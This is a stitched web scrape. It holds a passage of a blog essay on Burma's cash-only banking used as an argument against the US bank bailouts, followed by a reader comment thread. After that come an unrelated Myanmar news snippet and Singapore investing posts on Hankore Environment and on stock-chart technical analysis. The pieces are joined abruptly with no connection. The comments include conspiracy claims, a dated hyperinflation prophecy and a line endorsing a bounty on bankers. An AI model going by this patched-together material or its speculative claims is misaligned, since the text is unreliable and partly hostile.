A real estate purchase is done the same way: all cash, baled up and stuffed into the kind of nylon sacks migrant workers from developing countries carry their lives in when they return home. Years ago another bank tried to introduce the concept of mortgage, or at least a home equity loan. Many recipients did not know they had to repay, thinking that the loan was some kind of reward for owning a home. (I guess Americans are not that much different from Burmese after all.) That bank went bust, too. Capitalism works if allowed to work.

A visit to the buildings known as banks is quite an experience, one from which I have yet to tire. Some of the buildings are rather grand, while others look as if a good strong wind could bring the entire edifice down. Inside one would be hard pressed to find a loan officer or even someone to open an account. Indeed, I have never seen either one. What they do have are facilitators who arrange for fund transfers, a slew of strong young men to lift the heavy sacks of money that get carried inside, and a gaggle of barely-out-of-their-teens women behind the counter, each manning a bill counting machine.

The banks are crowded and the atmosphere is hectic. A flat panel TV hanging precariously from the ceiling blares out the latest local music video. Children play around on the floor. Bales of money are tossed about like medicine balls, often over the heads of the rows of customers sitting on primary color plastic chairs awaiting word that their money either arrived or was successfully sent. There are no formal lines, but the crowd gushing around the counters seems to follow a natural law that allows first come first served. Forms are filled out, ID cards shown, the obligatory stamps and signatures obtained, and the money is sent, arranged via a telephone call with the receiving branch. A truck arrives in the front, and five barefoot young men pile out and begin tossing sacks of money passed the security guards into the bank lobby. Customers make room, though there is not much free space. Soon, the bags are ripped open and bales tossed on to the service desk, from which the women, faces smeared with yellow thanaka paste, then begin the long process of counting what might be fifty or even a hundred thousand pieces of fiat paper. If the money is part of a real estate deal, the number might be in the millions. The whirr of the machines is constant, the women focused. The scene has a simple beauty.

As the piles of money move from in front to behind the counter, a kind of makeshift furniture is formed which sometimes serves as a place for staff to sit and take a tea break. Five money bricks for a seat, ten for a table. When the money is counted, a receipt is given, and the customer walks out just in time for another truck of money to arrive. It is mayhem. Cacophony. It certainly ain’t Bank Pictet, but it works.

Most of the banks have vaults where the excess from a day of inflows and outflows is stored. Some banks do not have vaults. I can only assume that with the denomination of the currency being as small as it is, it would take a robber so long to remove enough cash to make theft worthwhile, that by the time he finished, the work crew would be arriving for the new day and would catch him in the act. It might also be that the people are pretty honest.

My favorite treat is to arrive early and watch the staff in banks where vaults do exist, unload cash into the counter area in preparation for customers’ arrivals. In assembly line style, three or four men spread themselves out in a line, from vault to counter, and pile stacks of notes baled in thousand piece packs. Ten of these packs are piled, but not bound, then tossed from man to man, bucket brigade style. That’s $10K equivalent per toss, by the way. In ten minutes perhaps a million dollars has been tossed from vault to floor, and not a single brick has been dropped. Tinkers to Evers to Chance would play second fiddle to this display. I seriously doubt Lloyd Blankfein could pull it off. In things that excite and fire the soul, he is a man of lesser talents.

So there it is. A world without banks. It could have been us.

its all good but wrong. Credit system exist. Its call loan sharks. Majority of them spread in Chinatown of Yangoon. Rates as high as 50% monthly and if you don't pay they going to kill your family as most of them linked into triads. In addition to it there are various types of colaterlized lending where interest rate depends on collateral type and can be as low as 10% monthly interest if you use land as collateral asset. So, get your fact straight please

That's the tier 2 banking system. It's the same system it's just a matter of using the tier two system to try to keep as many people as possible in the tier one system. The banks are an ugly abusive bastard. So they have to keep the even uglier and even more abusive system in place so that they look good by comparison. It's like the family guy where you hire an ugly person to walk around and look horrible so you look better by comparison.

"Lack of regulation" doesn't mean "immune to law". Without banks, large capital projects woud never get built (Myanmar doesn't even have paved roads, no skyscrapers, no aqueducts, no modern port facilities, no trains (unless they were built by outsiders), etc), and waste is introduced into the system as you force individuals to spend time and money doing their own investment research, rather than entrusting some person to look after their money in a responsible manner (read the comic I posted).

Understand that regulations on banks hurt small banks 100% of the time, and large banks

0% of the time. Subsidies help large banks

100% of the time, and hardly touch small banks. As such, banks are encouraged to grow ever larger. Further, introduction of moral hazard by communo-fascist central bank guarantees encourages banks to make stupid decisions which lead to the mess we have now.

Or have you been under a rock for the last three years?

seems like you fail to see that the same law that prevents most people from being "raping, speeding, hooker killing" is the law that protects said ambassadors with diplomatic immunity from retribution by the victims or relatives of the victims. and you don't need vigilante justice, just an unmonopolized system of law enforcement.

I'm with McCulley on the concept of enhanced liquidity, but we could do such a better job of it than we are. Decentralized control and lower higher reserve ratios. But then we have the problem of the 30's. No lo sé. I'm not smart enough. This is a paradox.

Seems to me like instead of the banks pillaging the people (using the government as an accomplice), it is simply the government directly pillaging them in Burma. 5000% inflation in property? 1000 kyat = $1? They gotta be printing a heck of a lot of fiat money pieces for sure (and looting the savers in the process). Plus we have restrictive import policies which ensure that people have to pay thru the nose (most of the money going to the government coffers) for basic amenities, hence lower standard of living (e. g. $20k for a 1981 car). The labels may change (i. e banks, government, etc.), but the essence remains the same - a few oligarchs looting the masses.

And then there is the question of where do the Burmese oligarchs get their money/power? Selling natural resources for - that's right - US Dollars - which they get from the US companies/other USD enabled oligarchical countries doing business with them - which they then proceed to keep for themselves instead of lifting the living standards of the populace. So basically the deal is - you sell your natural resources to us on the cheap instead of using them to lift your own countrymen's living standards and we'll keep you in power and flush with dollars which you can then use for your personal benefit. So, ultimately, it's not that Burma is untouched by banksters - it's just that they call them "the government" over there; not to mention that the rot in Burma is enabled by none other than that filthy bankster product - the fiat US Dollar.

That's some keen insight.

Just like other natural resource-rich EXPORTING countries that think they are so much better off than the rest of the world.

They don't seem to realize that they are hollowing out their own country for the almighty dollar, directly selling out the ground from underneath their own feet.

Denial, stupidity, ignorance call it what you want but what's left when these countries have exceeded "peak" reserves and the wind down begins?

Precisely, they're selling out for pieces of paper that have no intrinsic value. It's amazing to me the stupidity of these globalised countries that they're that naive to sell tangible things with value for pieces of paper or electronic digits created as ledger accounts. Humans are strange what they believe in as advantageous somehow believing in the full faith & credit of Ben Bernanke. If I was a mining company in Myanmar selling rare elements, I would accept only gold bullion as payment, after assaying it for its fineness. No paper please.

Stupidity? Their resources are needed elsewhere in the world by countries that without them would know domestic unrest.

Taking the option of self preservation is not always stupid.

GG, perhaps you will get a kick of sorts out of this. First, the biggest source of funds for the country is China. China is the "neo-colonialist" buying up the natural resources of the country, and (in my view) is the biggest threat to the country's future independence. Other than Chevron on the pipeline, US firms are non-existent (as I was corrected on RIG). And here's the kicker: about three years ago the government began carrying out its jade auctions priced in euros, not dollars. While the dollar is still the second currency among the general populace, the government is trying to make it a kyat-yuan-euro based economy. In other words, the generals of Burma just say "no" to the US Dollar and Ben and Timmy's printing and spending machine.

Chindit and Gordon, you both are kind of making the same point: that almost any country has its points of corruption (vampire squids if you will.)

USA has its banks and. gov.

Burma has its generals running the show.

Some of the developing countries I know (though perhaps not really well) offer somewhat of a blend of Burmese (Myanmarese?) and the USA's models: banking is there, but credit is hard to get (Peru comes to mind).

Gordon makes the point that a vampire squid is always out there.

Chindit makes the point that a colonial threat (China) will likely take Myanmar at some point. They already are building a naval base in Myanmar. And as you say, China is the asset stripper.

I do not see personal liberty as any kind of priority there (at least some of us seek liberty here). Further, since I do not speak the language, Myanmar is not on my list of places to invest or even visit.

Thank you for the piece from a place we read little about. That is one of my favorite reasons for reading ZH, the insights people pass along from different places as well as from the little known cracks in our very own system here.

Don't take my comment the wrong way (I wouldn't write that long a comment if the post wan't worth it :-)) - I think the piece you wrote is just awesome - but by writing that comment I was also trying to clear some things in my head. I'll just say that cash and carry is good but it doesn't mean good things are happening for the people UNLESS the cash is not a fiat currency, in which case it is perfect. I think we're getting there as a society i. e. complete and total repudiation of fiat currencies all over the world with the subsequent reduction in oligarchical powers.

You can actually set up new co-op banks on an emergency basis in a NY second.

You need brave politicians with brass cojones. I hate to see so many talented politicians sell their souls to the devil where they could have been hailed as heroes.

Where are you brave ones? "We the people" will exhalt you to an apotheotic state of divinity and you legacy will be eternal. Dónde estás? Show yourselves. Glory and appreciation is higher than ill obtained riches.

All you have to do is appear on all TV shows and just tell the truth. Just say that you will close the evil big banks and either abolish or audit the FED. Turn the tide on the banksters.

This is a correct statement that few outside ZH understand:

"Yes, the collapse of the financial system would have had dire consequences--- for the ones who caused its near demise. Their world almost did cease to exist . and it would have eviscerated them, one and all. Sadly, we lost an opportunity." (italics added)

Had someone bold and not utterly in thrall to the bankers been in a position of power, in September - October 2008 we had the opportunity to reshape the system - and I guarantee it could have been done with surprisingly less trauma than you might think. Think of the resources marshalled to put Humpty Dumpty back on the wall, and what could have been accomplished.

Speaking of the shooting range, there is no recession in the guns n ammo business. I now go shoot during the week to avoid the worst of the crowds. Even so, the place is packed, hardly a parking spot and lots of new shooters (which makes me nervous enough about being shot by a newbie that I now wear a bulletproof vest). I wonder where they get the money to burn through all that ammo.

I'm going to have to start going at 5 am.

no recession in the guns n ammo business

So much so that it has been hard to get components to even make our own ammo. People hoarding everything from primers to bullets and powder, combined with some companies operating at max capacity solely for the government machine results in the common man (me and many others without the luxury of infinite funds) having to pay out the wazoo when and if components become available.

TD, scores another TD.

A developed country is a more levered country.

This relates to the fact of more liticiousness with regards to property rights, which at the end of the day, transalates into less freedom for the populous overall.

Do note that the less developed countries offer fewer financial freedoms, but more "everyday" types of personal freedoms.

As one relies more and more on their government, their price becomes loss of general human everyday freedoms.

Most developing countries do not even offer many credit cards, long term mortgage loans, easy auto loans: and thus do not have the means to over-lever themselves. However where over-levering is possible ie the governments themselves, they do just that.

In other words, if they can, they probably will.

So there are parts of the world without banks for individuals, but it is their governments which have access to outside banks that get them into financial trouble. Just another "weak hand" to be smacked at a later date by an interested "stronger hand".

Yes, some people missed the point. Thus, it bears repeating: if we had let the big banks fail, the ones who suffered the most would have been the ones who caused the problems, but the society and people would have survived. Seems fair, no? The people who had saved and acted responsibly would have had the money to come in and pick up the pieces, and more importantly would not have had to pay for errors they did not make. People might also have learnt that foregoing immediate gratification, especially when one cannot afford it, is simply prudent.

I used Burma as an example because it both lacks a modern banking system and has one of the harshest environments on the planet (plus I do live there). Despite that, its economy has developed, and the standard of living---while not up to typical western standards---has climbed markedly over the last decade. The US is infinitely further along in terms of infrastructure and ability to be competitive in the world, so absent the big banks the recovery could have been rapid, rather than the woeful end-of-the-world scenario those with much to lose used to scare us into opening our wallets. The system would have re-invented itself after a period of dislocation, albeit having learned lessons. Instead, we pulled out every stop to save the very same system and players that brought about the collapse. That is simply stupid, and undoubtedly will come back to bite us on the arses again.

So Burma is used as a means of contrast, and to offer an example of the power of the human spirit to exist under any and all circumstances. Our leaders, sadly, would have us believe we would have all shriveled up and died if we let BAC and C and the rest of them go.

If me paying for AIG's, BAC's, Countrywide's, FNM's, etc. mistakes is "freedom", then I would like to see the menu again and make another selection. But if you think that is a good thing, then I'll return the favor and hereby sentence you and your offspring to work the rest of your lives to support the lifestyle of Lloyd and Jamie and the next Angelo.

I would advocate that there is no such thing as a failureless system, regardless of how hard some may wish that this time is different. The failure to permit "systemic" failure has rendered far greater havoc than whatever the results of the failure would have been, then. All human systems eventually fail as human theory meets human conduct!

I've been to Burma many times. There are no ATM machines there, since there are no banks. The reason for this is that the military junta in charge believe that the kyat (jat) is worth a lot more than the rest of the world. Banks are forced to use the govt's exchange rate and thus can't operate. You have to go to a market and there are guys who exchange dollars or thai bhat into kyats. The biggest bill there is less than a dollar. Very poor and completely corrupt country.

Excellent informative post. +1

Facts and figures on the ground instead of a talking head talking out his ass. where the idiot "expert" has never been outside the NY studio or to the region he pontificates on. think Lies-man.

" despite the odd fact that 35% of its standing army will be involved in guarding the two lines."

So Does 2/3 of the US Standing Army Abroad

So what is so odd about that? The plans for an Afghanistan pipeline have been on the drawing board with the neo-con-men/ oil lackeys for over a decade and well before before "9/11." US military invasion planning centered around securing Iraqi oil pipelines and installations as priority #1 (FOIA).

The US has at least 820 known military installations with at least 290k troops stationed in 135 countries (out of 192).

The function of the US military abroad is to enforce US corporate rule and profits, not to protect you and me in spite the incessant propaganda to the contrary. And don't start that "US as world cop" crap.

US Corporations Should Pay for the US Military Abroad

The greatest externality of our life time. Massive $1 trillion a year military budget is comprised of corporate welfare to war contractors (GE et al) and installing US corporate rule abroad. the same US corporations that fuck US citizens on a daily, weekly, yearly, lifetime basis.

So why are US citizens footing the bill? Corporations should pay the US war bill through taxation since they are the ones that benefit.

If you want defense at home. I would suggest the classic Browning HP 9mm and the good ol' M1 Garand. But I digress.

$20K for a 30yr. old car? With the average GDP per capita $1200 according to CIA? https://www. cia. gov/library/publications/the-world-factbook/geos/bm. html - most fascinating!

"Their currency was the world’s strongest currency in 2009" but they've just introduced 5000-kyat note? Even more fascinating! (or did you happen to use the "official" exchange rate to make a point how great non-banking economy can be, while in reality inflation is much higher? Looks like you're up to your old wall st. tricks, my dear! Repo-105 stuff, you know? )

Anyway, without arguing about benefits of the banks, I have a question: according to you, the whole economic growth deal is based on metal mining (extremely harmful for everyone who happens to live there, just google Norilsk nickel), energy resource extraction, and chopping down forests.

This may very well be so, but traditionally and increasingly Burma is know for two other businesses, which also traditionally and incresingly involve western tourists and ex-pats. The same CIA web site, https://www. cia. gov/library/publications/the-world-factbook/geos/bm. html. describes them as the following:

" Burma is a source country for women, children, and men trafficked for the purpose of forced labor and commercial sexual exploitation; Burmese women and children are trafficked to East and Southeast Asia for commercial sexual exploitation, domestic servitude, and forced labor" (BTW, is this what you mean by writing " welcome to SE Asia and the world of your wildest fantasy", 'cause so far I've yet to see any westerners except the journalists going to Burma for other reasons. and U R not a journo. )

" remains world's second largest producer of illicit opium with an estimated production in 2008 of 340 metric tons, an increase of 26%" - yep, you sell 340 metric tons of heroin, sure as ehck you can afford $540K Lancruiser.

So, in which of these industries (stealing natural resources while poisoning the people, the "alternative" tourism or shipping dope to the West) do you, using your own words, "try to find a way to add value"?

Again, Burma itself is secondary to the purpose of the post, as explained in an earlier comment.

That being said, let me relay a story that hits on some of the "facts" you note:

In 2003 the US imposed the first of its heavy sanctions against the country, banning the import of all goods produced there into the US, and prohibiting investment by US firms or citizens. Various Congresspeople applauded themselves, as they are wont to do.

Immediately somewhere between 100K and 300K, mostly young women and young mothers, lost their jobs because they worked sewing clothing exported to the US. The ostensible target of the sanctions---the Myanmar Government---was not impacted at all; in fact, this move drove them closer to China.

Children were pulled from school because without the breadwinner working, families could no longer afford books, uniforms and fees. Other children lost battles to easily curable diseases because the money needed to buy medicine was gone. Far too many young women and girls used the only asset they had to try to earn money, which means many ended up in the brothels of Thailand, Malaysia, Macau, etc. Sanctions were applauded in these places, too, for an obvious and mercenary commercial reason.

I remember speaking with a young mother, newly unemployed, distraught about not being able to pay for her kids school. She asked, "Chindit, why does your government hate me?"

As noted in the piece, Chevron (then Unocal) received an exemption from the very same Congresspeople applauding themselves for their "belief in freedom and democracy", even though the combined textile plants might have put upwards of a few thousand dollars a year into government coffers while Unocal/Chevron's gas pipeline puts 25% of all revenues.

After the street protests of September 2007, the US further strengthened sanctions against the country. Chevron, originally included in the bill, got itself exempted yet again.

As for men going there for the reasons you note, I rather regret one of my opening lines in the piece, which was in bad taste. In point of fact, most come as tourists, some come on business (not every country has sanctions). Many others come offering private donations to people and organizations trying to improve the lives of the average person there.

Incidentally, the US is continually trying to impose a morality or an economic discipline on the rest of the world that the US itself lacks. The world calls bullshit. China vs. Burma re sanctions. Chevron. Democracy demands in Burma vs. Saudi Arabia's monarchy and prohibition (with capital punishment for violators) against the practice of any religion other than Islam, Geithner's tenure at IMF and the 1997 Asian Finacial Crisis, Japan's 1990 collapse and the advice given by the USG, etc.

An uncle of mine used to work for a private security firm here in New York that once a month would rotate to different boardrooms and work overnight sweeping for bugs, checking telephones and securing them for commission like meetings of all of the large Wall Street firms with roughly 25 people in attendance. Sometimes it was Bear, Morgan and Lehman. He told me this for the first time last night and said " it was at these meeting that they would carve up the world and nearly every event that occurred in the markets was orchestrated along with leaks to the media:.

The world won't be safe until there's a million dollar bonus on all their asses.

Hehehe I do appreciate the time you spent writing this piece as I enjoyed it very much.

Splendid piece. Reminds me somewhat of my days in Thailand. As for the bankers, perhaps it is time to rethink Bladerunners.

Most of my dealings with "banks" in Myanmar were of the "black market" kind (often at gold jewellers). The true value of the currency has nothing to do with the posted rate.

As for the economic situation my mind still is engraved with the folks with their hammers knocking on rocks to make gravel for the new road, followed by women carrying said gravel to the road location in big baskets. My understnadingw as thta this "work" was "voluntary". menaing you did it or else.

I love the people of Myanmar. there is no more "softer" place on this planet. But I cry for them as well as the current government is selling the country off to the Chinese who are in an awful big hurry to arpe the place of its rtesoucres at bargain prices before a "people centered" government emerges.

F^ck the generals, and F^ck the Chinese too!


I want to say it will happen Tuesday, but these damn treasurie issuances are "M"asking the "M"arket; ISIS is VEILED, she is wearing pink lip gloss and listens to Lady "MA" GAGA on repeat. I will go out on a limb and say HYPERINFLATION/HYPERDEFLATION will become apparent on Tuesday (FOUR SIX TEN, 4.6.10). If this week goes the way the US "Government" (CORPERATION) wants, it will be delayed a week or so. Judging from fundamentals/technicals, another massive issuance this week WILL most likely delay the imminent. However, the apex is fast approaching. OVERSTAND THIS; THIS ISSUE HAS MANY COMPONENTS. Incluyen; peak oil, PEAK ENERGY, peak gold, peak steel, peak silver, PEAK FOOD, PEAK WATER, the drug trade, devaluation of all currentseas, soveirgn debt, over priced real estate, the complacency of America, the greed of the oligarchs, and the dumbness of politicians. Once the "HFI" hits, it's on. America will think it knows how to play the game. it doesn't. BE READY BY 4/20/10. BE READY!

Isis, oh, Isis, you mystical child. What drives me to you is what drives me insane.

Chindit - Bravo! Thouroughly enjoyed your style and substance. I only hope you did not write this on your laptop while sitting at Starbucks. You might have been mistaken for one of those seeming "to exist alone in their own soul-less world". Harsh irony. Rockford//OUT

If you mean my avatar, it's Charles Orde Wingate.

The history of the Second World War in the Burma theater is full of characters like Wingate, Slim, Stilwell, Merrill, Cochrane, the AVG, the "Hump" flyers, and many others. Having spent a good deal of time in the areas of former conflict there, I never ceased to be amazed at what the people who fought had to endure. The environment is harsh enough, what with malaria, dengue, cobras and Russell's vipers, tigers and leopards, crocodiles, 45 degree heat and monsoons, impenetrable jungles. but being shot at, too, just makes it all too much. It's a wonder anyone, especially a 56 year old like Stilwell, walked out alive (literally).

A highly religious man!

sorry, that really scares me, don't have the depth.

fuck you kinda sound like the buddha

also gained a reputation as a late payer of his bills

Wingate set off in September 1927 by bicycle - velo

ok you got my attention, now

Chindits and the first long-range jungle penetration mission

oh my god the visual is cracking me up

how the mind works'

a corrupted version of the name of a mythical Burmese lion

he would consume raw onions because he thought they were healthful,

oh my god i am really into this man†

AUDIos it is late

WHAT a fantasy†

A fictionalised version of Wingate called "P. P. Malcolm" appears in Leon Uris 's novel Exodus .

his ex-wife, photographer Jill Uris, said today from her home in Aspen, Colo. uhm, i knew her slightly.

Up until 2004 we had a rapidly expanding private banking sector with Yoma Bank, Kanbawza Bank, Asia Wealth Bank rapidly expanding the number of branches, investing in VSAT networks to speed up the remittance process, debit cards and so on, but this all came to an end with a rumor that created a run on AWB and then spread to the others. The gov't then used this as an opportunity to close a number of the banks down, due to the owners involvement in the heroin business.

This does of course beg the questions as to why they were issued banking licenses in the first place, and whether or not there was outside pressure to close them down. None of the banks actually failed though, they were taken down. Since then the remaining banks are crippled whilst still having to pay interest on deposits, whilst at the same time being unable to make any loans.

An amusing story is that one of the banks was building their new head office, and after construction had started the owner wanted to move the vault from the basement to the 1st floor. However some quick calculations for the volume and weight of the bales of money indicated that the 1st floor would have collapsed long before the vault was full. So the vault remained in the basement as originally planned. The vault itself included a top of the line door built and installed by Chubb and providing the highest level of security. The only problem was the walls to the vault were originally built solely of brick and cement, although I hasten to add that this oversight was quickly corrected.

In terms of cars I believe we must be one of the only countries where cars are considered investments, and where their value goes up as they get older. It's taken me over a decade to get my head round that one.

BTW Chindit, ever drink at the Savoy?

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Military extends full cooperation to Myanmar president

Congratulating U Htin Kyaw on becoming the President of Myanmar, the military pledged its cooperation even as it faces questions from the ruling National League for Democracy (NLD) members for choosing a former general for the post of vice.

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Posted: 23 Sep 2013 07:00 PM PDT

Since a change at the helm of Hankore Environment Tech Group in 2011, the firm has posted two consecutive years of profit and clinched numerous awards, including recognition as one of the Top Ten Fastest Growing Water Companies in China. Will the management be able to ride on their success wave to new heights?

Back in 2000, before China commercialised its water treatment industry, the nation possessed 360 plants. Fast forward to present day and we are faced with over 4,000 water stations serving the country while 2,000 more are being constructed as well as 5,000 additional plants targeted in five to 10 years' time.

With an array of wastewater treatment businesses within the industry to venture into, it is easy to lose focus and attempt to expand into other areas which may seem profitable. However, Hankore has decided to stick with what it knows best – sludge handling, residential and industrial water treatment.

Earnings Visibility In our recent interview with Hankore's chief financial officer, Felix Yau, it was highlighted that the high gross profit margin enjoyed from wastewater treatment is the reason for the decision to drive growth in the segment. "Hankore is able to secure higher water tariff rate and daily contracted treatment capacity as it progresses along each phase for each project," added Yau. In the case of the recently upgraded plant in Nanjing Liuhe, its capacity was doubled to 200,000 tons per day and the tariff rate increased from Rmb0.92 per ton to Rmb1.45 per ton.

As each water plant only serves one client, the firm is able to sign agreements with their customers guaranteeing the minimum tariff rate and daily capacity. "Hankore has a strict policy of only dealing with clients that we trust and possess sufficient funds to facilitate the capital expenditure required for the development of the water plants," shared Yau.

This translates to a high water charges collection rate experienced by the firm. In turn, this provides investors' with a clear picture of the potential income Hankore is able to derive from their wastewater operations during the concession period, which usually lasts for 25 to 30 years.

Sustainable Improved Margins As evident in their latest financial performance, the construction segment's turnover improved to Rmb167.5 million from Rmb72.8 million in FY12, contributing 45.4 percent of the full year's result compared to 29.7 percent in the preceding year, while its gross profit margin rose 6.3 percentage points to 15.1 percent. Although the management expects to maintain the improved construction business margin moving forward, it recognises the fact that construction income tends to occur only once for each project.

This foresight has led them to focus on expanding and upgrading their water plants instead, as they chase higher water tariffs and contracted capacity which offers a recurring effect absent from the construction business. In FY13, the wastewater treatment unit pulled its own weight as revenue increased Rmb29.3 million to Rmb201.5 million year-on-year while its gross profit margin gained 4.5 percentage points to 69.8 percent.

Wave Of Expansions And Upgrades Presently, Hankore has identified six out of its existing 11 water plants prime for expansion and upgrading works, estimated to cost Rmb750 million. Out of the total cost, approximately 65 percent, or Rmb487.5 million, will be financed through bank loans, while the balance fulfilled by issuance of placement shares and its multicurrency medium-term note programme. Recently, the firm made a private placement to Wang Yu Huei, a notable investor in the Singapore scene with stakes in Dukang Distillers Holdings and Sarin Technologies, and will be looking to make more placement shares available in the next annual general meeting.

Yau acknowledged the need for external funds, "The management has a debt to capitalisation threshold of 50 percent which currently sits at 27.3 percent, in line with other industry players. This presents the firm with plenty of headroom to take on more debt to support our expansion and upgrading plans." Yau stressed that the funds obtained will be used solely for expansion and upgrading purposes and intends to release future tranches of its note programme only on a need-be basis.

Business Outlook Although expansion promises higher income, David Chen, chairman of Hankore, emphasised that the management will not sacrifice the quality of its profitability and collection rate. However, with 0.9 million tons worth of existing water treatment capacity not utilised, the firm will focus on completing the internal upgrading plan to maximise its current portfolio.

Not only does the recent acquisition of Jiangsu Tongyong Environment provides the firm with necessary licenses and an experienced team in the engineering, procurement and construction segment in a far shorter duration compared to the time it would have taken the management to develop their own capabilities and apply for the licenses, it would direct previously outflowing earnings to subcontractors into the pockets of Hankore in the future.

"A large portion of our projects are aimed at residential wastewater treatment, which has simple and stable end-users compared to the industrial segment, where different industries would impose various criteria on the treated water," noted Chen. Based on data furnished by the firm, residential water and sewage treatment demand in China is expected to reach 120 billion cubic meters by 2030, up from 78 billion cubic meters in 2010.

Making reference to a recent analyst report from Maybank Kim Eng, Hankore is presently trading at 8.2 times its 12-month trailing price-earnings ratio compared with a 22.6 times average for its SGX-listed peers. At such an attractive valuation, would you want to get your feet wet in the water treatment industry?

Posted: 23 Sep 2013 03:23 AM PDT

Asian stocks rallied as the Fed unexpectedly refrained from tapering and as Lawrence Summers withdrew himself as a candidate to be the next Federal Reserve chairman. (See Table 1 for the indices' performance over the past two weeks)

Table 1: Indices' Performance Over The Past Two Weeks

Source: Bloomberg; Ernest's compilations

Two weeks ago, I mentioned that the Standard & Poor's 500 (S&P500) was unlikely to cross above the rising trend line (1,695 at that time of writing) before the FOMC meeting. It did not cross above the rising trend line on Day 1 of the FOMC meeting, but managed to rise above the rising trend line on Day 2 of the meeting when the Fed surprised the market by refraining from tapering. It closed 1,726 on 18 September (Day 2 of the meeting) but eventually weakened to close at 1,710 on 20 September. (See Chart 1 below)

RSI reached a high of 72 on 18 September before closing at 63 on 20 September. Since 19 January 2011, RSI has reached around 75 for four occasions. Thus, it is not unexpected that S&P500 gave up some of the gains after reaching a record high on 18 September.

Since 30 August, S&P500 has advanced for 11 out of 14 sessions. At the RSI of 63, it is not overbought. It remains to be seen whether S&P500 can hold above 1,700-1,709 in the next two weeks. However, it is very likely that S&P500 has formed a significant low near 1,630-1,635 and unlikely to go below that level barring any unforeseen circumstances. Important supports to watch are 1,700/1,672 -1,674/1,657.

Chart 1: S&P500 Rose To A Record Close 1,726 Before Closing 1,710

Source: CIMB itrade complimentary chart (20 Sep 13)

Two weeks ago, I mentioned that if the Hang Seng Index (HSI) breached the upper trading range of 22,580, it was likely to head to a high of 23,500 which was the high seen on 20 May. I wrote that the odds were less likely given the existing stock market headwinds. However, I pointed out the odds depended on the strength of the Shanghai Index. Shanghai Index continued to rise about 5.4 percent from 2,140 on 6 September to more than a three-month closing high of 2,255 which provided (at least) some impetus to HSI which managed to reach the measured technical target of 23,500. It closed at 23,502 on 19 September.

HSI's RSI was 72 on 19 September. The recent high that HSI's RSI reached was 79 on 25 October 2012. Since 28 August, HSI has appreciated sharply, culminating with a gain of 1,978 points, or 9.2 percent in 16 trading sessions. It is likely that HSI may consolidate first after such gains. Significant supports can be seen at 22,700 & 22,280. Resistances are at 23,640 and 23,945 (See Chart 2 below)

Chart 2: HSI May Consolidate Its Gains; 1st Key Support: 22,700

Source: CIMB itrade complimentary chart (20 Sep 13)

Two weeks ago, I wrote that the Straits Times Index's (STI's) near term rebound was likely to be capped around 3,097-3,163. It was stronger than expected, helped in part by Fed surprise move. STI closed at 3,238 on 20 September. It was up a hefty 233 points, or 7.8 percent since the low set on 28 August.

It is likely that STI may also consolidate its gains. Key supports are around 3,204 & 3,184. Resistances are at 3,269 and 3,278. (See Chart 3 below)

Chart 3: STI May Consolidate Its Gains; 1st Key Support: 3,204

Source: CIMB itrade complimentary chart (20 Sep 13)

Fundamental Aspect Although the Fed has unexpectedly refrained from tapering in its September meeting, there is still much uncertainty over when Fed may start to taper. There are several Fed speakers who will be speaking this week which may add uncertainty as market continues to guess when the Fed may start to taper. Last Friday's market weakness was due in part to the speeches by the Fed speakers.

In addition, according to Reuters, US policymakers have to come up with a budget deal by the end of September and to decide whether to raise the debt ceiling by approximately mid-October. Although it is likely that they will eventually come to a decision, the process may add some uncertainty to the stock market.

Furthermore, the outcome of the Germany elections may contribute additional volatility to the stock markets.

Summary In view of the above, markets are likely to remain choppy, especially after the gains seen in the past two weeks. Nevertheless, I remain bullish on equities with a horizon of a year. Personally, depending on the market, I would be slowly raising my stock allocation from 20-30 percent on market weakness in the next one to two months, perhaps up to 80-90 percent.

Do note that everybody is different in terms of returns expectations, risk profile, portfolio size, commitments, market outlook, stock preference etc. I am only giving myself as an example. [Another important point is that, due to the nature of my work, I can raise or decrease my allocation rapidly.]

Below are chart reviews of the four stocks, namely Kreuz Holdings, Swiber Holdings, Dukang Distillers Holdings and King Wan Corporation which I have mentioned two to four weeks ago. In addition, I will like to bring attention to Sino Grandness Food Industry Group's chart.

Chart Reviews: Kreuz, Swiber, Dukang And King Wan

1. Kreuz Holdings – 6 September Close: $0.730, 20 September Close: $0.780, Intraday High On 16 September: $0.810 Two weeks ago, I mentioned that there seems to be buying interest for Kreuz as it has rebounded off its 100D EMA to close at $0.730 on 6 September with the highest volume last seen on 1 August. It continued to move and touched an intraday high of $0.810 on 16 September. It is currently trading within a tight range $0.770-0.810. Volumes expanded on days when Kreuz rose and contracted on days when Kreuz fell. Thus, it is a tad bullish signal. Odds are slightly higher that Kreuz may eventually break out of $0.810 after consolidation. If it breaks out of $0.810, an eventual measured technical target is approximately around $0.950. Supports and resistances are at $0.770/$0.750-0.760 and $0.800/$0.810 respectively. (See Chart 4 below)

Chart 4: Kreuz Range Trade Between $0.770-0.810

Source: CIMB itrade complimentary chart (20 Sep 13)

2. Swiber Holdings – 6 September Close: $0.650, 20 September Close: $0.665, Intraday High On 13 September: $0.695 Swiber managed to gap up on 9 September and reached an intraday high of $0.695 on 13 September. Based on Chart 5 . the levels to watch would be whether firstly, Swiber would close the gap between $0.650-0.660 and secondly whether Swiber would close below $0.650 for three consecutive days. Swiber's chart continues to be weaker than Kreuz. However, if Kreuz strengthens significantly, Swiber is likely to follow to a certain extent, albeit with some lag. Supports and resistances are at $0.660/$0.650 and $0.670–0.695 (confluence of resistances) /$0.705 respectively.

Chart 5: Swiber – Key Support At $0.650-0.660

Source: CIMB itrade complimentary chart (20 Sep 13)

3. Dukang Distillers Holdings – 23 August Close: $0.445, 20 September Close: $0.500, Intraday High On 19 September: $0.520 A month ago, I mentioned that based on chart analysis and price action, the odds seem to favour that of a breakout above $0.475. Dukang's price was momentarily weakened by Glaucus Research's report on Minzhong released on 26 August. News that Fidelity Worldwide Investment (FIL) has become a substantial shareholder of Dukang (announced on 12 September) gave Dukang's share price a boost to move above $0.475. Supports and resistances are at $0.470–0.475/$0.455-0.460 and $0.525–0.530/$0.560 respectively. (See Chart 6 below)

Chart 6: Dukang Surged After FIL Became Substantial Shareholder

Source: CIMB itrade complimentary chart (20 Sep 13)

4. King Wan Corporation – 23 August Close: $0.320, 20 September Close: $0.300, Intraday High On 26 August: $0.325 A month ago, I wrote that if King Wan can breach the significant resistance around $0.325-0.330 with volume expansion, an eventual measured technical target price may be around $0.365. Conversely, if it breaches the support at $0.305 with volume expansion, an eventual measured technical target price may be around $0.265. King Wan did not manage to breach the resistance $0.325-0.330 but broke the support at $0.305. Given the low and sliding ADX of 18.0, it is likely to be range bound in the near term probably around $0.280–0.310 (See Chart 7 below). Supports and resistances are at $0.280-0.285 and $0.300-0.305 respectively.

